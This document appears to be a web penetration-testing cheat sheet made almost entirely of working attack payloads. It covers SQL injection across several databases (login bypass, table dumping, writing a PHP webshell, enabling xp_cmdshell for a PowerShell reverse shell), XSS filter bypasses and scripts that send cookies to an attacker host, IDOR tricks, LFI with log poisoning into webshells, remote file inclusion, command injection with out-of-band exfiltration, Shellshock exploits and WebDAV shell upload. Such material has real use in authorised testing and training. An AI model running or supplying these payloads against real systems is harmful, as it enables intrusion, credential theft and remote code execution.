-> Bypass Authentication
' or 1=1 -- -
admin' -- -
' or 1=1 order by 2 -- -
' or 1=1 order by 1 desc -- -
' or 1=1 limit 1,1 -- -
-> get number columns
-1 order by 3;#
-> get version
-1 union select 1,2,version();#
-> get database name
-1 union select 1,2,database();#
-> get table name
-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<database_name>";#
-> get column name
-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<database_name>" and table_name="<table_name>";#
-> dump
-1 union select 1,2, group_concat(<column_names>) from <database_name>.<table_name>;#
-> view web server path
LOAD_FILE('/etc/httpd/conf/httpd.conf')
-> creating webshell
select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/shell.php";
e.g.
SELECT LOAD_FILE('/etc/passwd')
-> Bypass Authentication
' or 1=1--
-> get number columns
' order by 3--
-> get table name
' union select null,table_name,null from all_tables--
-> get column name
' union select null,column_name,null from all_tab_columns where table_name='<table_name>'--
-> dump
' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--
-> extracting table names, not displaying standard sqlite tables
http://site.com/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
-> extracting table users
http://site.com/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--
-> Reference
-> Bypass Authentication
' or 1=1--
-> get version+delay
' SELECT @@version; WAITFOR DELAY '00:00:10'; —
-> Enable xp_cmdshell
' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
-> RCE
' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<ip>/InvokePowerShellTcp.ps1')" ;--
-> edit Invoke-PowerShellTcp.ps1, adding this:
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444impacket-mssqlclient <user>@<ip> -db <database>xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://<IP>/Invoke-PowerShellTcp.ps1\")
1-> Identify the language and frameworks used
2-> Identify entry points (parameters, inputs, responses reflecting values you can control, etc)
3-> Check how this is reflected in the response via source code preview or browser developer tools
4-> Check the allowed special characters
< > ' " { } ;
5-> Detect if there are filters or blockages and modify as needed to make it work
- https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/xss_bypass.txt
- https://gist.githubusercontent.com/rvrsh3ll/09a8b933291f9f98e8ec/raw/535cd1a9cefb221dd9de6965e87ca8a9eb5dc320/xxsfilterbypass.lst
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/XSS-Bypass-Strings-BruteLogic.txt
- https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/XSS-Cheat-Sheet-PortSwigger.txt
- https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
- https://www.chromium.org/developers/design-documents/xss-auditor/
- https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge
- https://developer.mozilla.org/pt-BR/docs/Web/HTTP/Headers/X-XSS-Protection
- https://rapid7.com/blog/post/2012/02/21/metasploit-javascript-keylogger/
- https://github.com/hadynz/xss-keylogger
-> Filter blocking on - Bypass
(on\w+\s*=)
<svg onload%09=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload%0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>eval("\u0061lert(1)")</script>
<script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
-> String.fromCharCode()
-> unescape
e.g.
-> decode URI + unescape method (need eval)
decodeURI(/alert(%22xss%22)/.source)
decodeURIComponent(/alert(%22xss%22)/.source)
-> unicode
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)"/>
Add execution sink:
-> eval
-> setInterval
-> setTimeout
-> octal
<img src=x onerror="eval('\141lert(1)')"/>
-> hexadecimal
<img src=x onerror="setInterval('\x61lert(1)')"/>
-> mix (uni, hex, octa)
<img src=x onerror="setTimeout('\x61\154\145\x72\164\x28\x31\x29')"/>
- https://checkserp.com/encode/unicode/
- http://www.unit-conversion.info/texttools/octal/
- http://www.unit-conversion.info/texttools/hexadecimal/
<div>here</div>
->
<svg/onload=alert(1)
<input value="here"/></input>
->
" /><script>alert(1)</script>
<script>
var name="here";
</script>
->
";alert(1);//
<button onclick="here;">Okay!</button>
->
alert(1)
<script>var ok = location.search.replace("?ok=", "");domE1.innerHTML = "<a href=\'"+ok+"\'>ok</a>";</script>
->
javascript:alert(1)
-> jjencode
-> aaencode
-> jsfuck
-> Xchars.js
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
-> Examples
<script>new Image().src="http://<IP>/ok.jpg?output="+document.cookie;</script>
<script type="text/javascript">document.location="http://<IP>/?cookie="+document.cookie;</script>
<script>window.location="http://<IP>/?cookie="+document.cookie;</script>
<script>document.location="http://<IP>/?cookie="+document.cookie;</script>
<script>fetch('http://<IP>/?cookie=' + btoa(document.cookie));</script>
git-dumper http://site.com/.git .- Search listing of Id's in requests and in case you don't find create at least two accounts and analysis requests involving ID's
- Identify access controls in the application
- Change the request method (GET, POST, PUT, DELETE, PATCH…)
- search old versions of API's /api/v1/ /api/v2/ /api/v3/
- Try sending a (*) instead of the ID, especially at search points
- Brute-force IDs depending on context and predictability
GET /api/v1/messages?id=<Another_User_ID> # unauthourized
GET /api/v1/messages?id=<You_User_ID>&id=<Another_User_ID> # authorized
GET /api/v1/messages?id[]=<Your_User_ID>&id[]=<Another_User_ID>
POST /api/v1/messages
{"user_id":<You_user_id>,"user_id":<Anoher_User_id>}
-> with a JSON Object
POST /api/v1/messages
{"user_id":{"user_id":<Anoher_User_id>}}
-> with array
{"user_id":001} #Unauthorized
{"user_id":[001]} #Authorized
GET /admin/profile #Unauthorized GET /ADMIN/profile #Authorized
-> add .json if in ruby
/user/1029 # Unauthorized
/user/1029.json # Authorized
git-dumper http://site.com/.git .
$language = str_replace('../', '', $_GET['file']);
/....//....//....//....//etc/passwd
..././..././..././..././etc/paswd
....\/....\/....\/....\/etc/passwd
-> urlencode and Double urlencode /etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
expect://id
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
-> Predefined Paths
preg_match('/^./okay/.+$/', $_GET['file'])
./okay/../../../../etc/passwd
https://site.com/index.php?file=/etc/passwd%00.php
-> Removing .php
https://site.com/index.php?file=index.p.phphp
-> gif
echo 'GIF8<?php system($_GET["cmd"]); ?>' > ok.gif
echo '<?php system($_GET["cmd"]); ?>' > ok.php && zip wshell_zip.jpg ok.php2-
http://ip/index.php?file=zip://./uploads/wshell_zip.jpg%23ok.php&cmd=id
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/wshell_zip.jpg
-> apache
nc ip 80
<?php system($_GET[‘cmd’]); ?> or
1-
curl -s http://ip/index.php -A '<?php system($_GET[‘cmd’]); ?>'2-
http://ip/index.php?file=/var/log/apache2/access.log&cmd=id
-> SMTP
telnet ip 23
MAIL FROM: email@gmail.com
RCPT TO: <?php system($_GET[‘cmd’]); ?>
http://ip/index.php?file=/var/mail/mail.log&cmd=id-> SSH
ssh \'<?php system($_GET['cmd']);?>'@<IP>
http://ip/index.php?file=/var/log/auth.log&cmd=id-> PHP session
http://ip/index.php?file=<?php system($_GET["cmd"]);?>
http://ip/index.php?file=/var/lib/php/sessions/sess_<your_session>&cmd=id
-> Other Paths
/var/log/nginx/access.log
/var/log/sshd.log
/var/log/vsftpd.log
/proc/self/fd/0-50
- https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/fuzzing/linux-lfi-fuzzing.yaml
- https://raw.githubusercontent.com/CharanRayudu/Custom-Nuclei-Templates/main/dir-traversal.yaml
-> burp-parameter-names.txt - Wordlist for parameter fuzzing
-> Wordlist LFI - Linux
-> Wordlist LFI - Windows
-> bypass_lfi.txt
- https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/wordlists/lfi_bypass.txt
-> poisoning.txt
echo "<?php echo shell_exec($_GET['cmd']); ?>" > evil.txt
python -m http.server 80http://site.com/menu.php?file=http://<IP>/evil.php%00.png
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > evil.txt
python -m http.server 80http://site.com/menu.php?file=http://<IP>/evil.txt&cmd=ipconfig
-> Special Characters
& <command>
&& <command>
; <command>
<command> %0A <command>
| <command>
|| <command>
`<command>`
$(<command>)
-> Out Of Band - OOB Exploitation
curl http://$(whoami).site.com/
curl http://`whoami`.site.com/
nslookup `whoami`.attacker-server.com &
curl http://192.168.0.20/$(whoami)-> Check if the commands are executed by PowerShell or CMD
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
-> Detection
nikto -h <IP> -C all-> Exploit
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'whoami'" <IP>
curl -A "() { :; };echo ;/bin/bash -c 'hostname'" <IP>
curl -A "() { :; }; /usr/bin/nslookup $(whoami).site.com" <IP>-> Connect to WebDAV server and send malicious file to shell
cadaver http://<IP>/webdav
put <shell.asp>curl -u "<user>:<password>" http://<IP>/webdav/shell.asp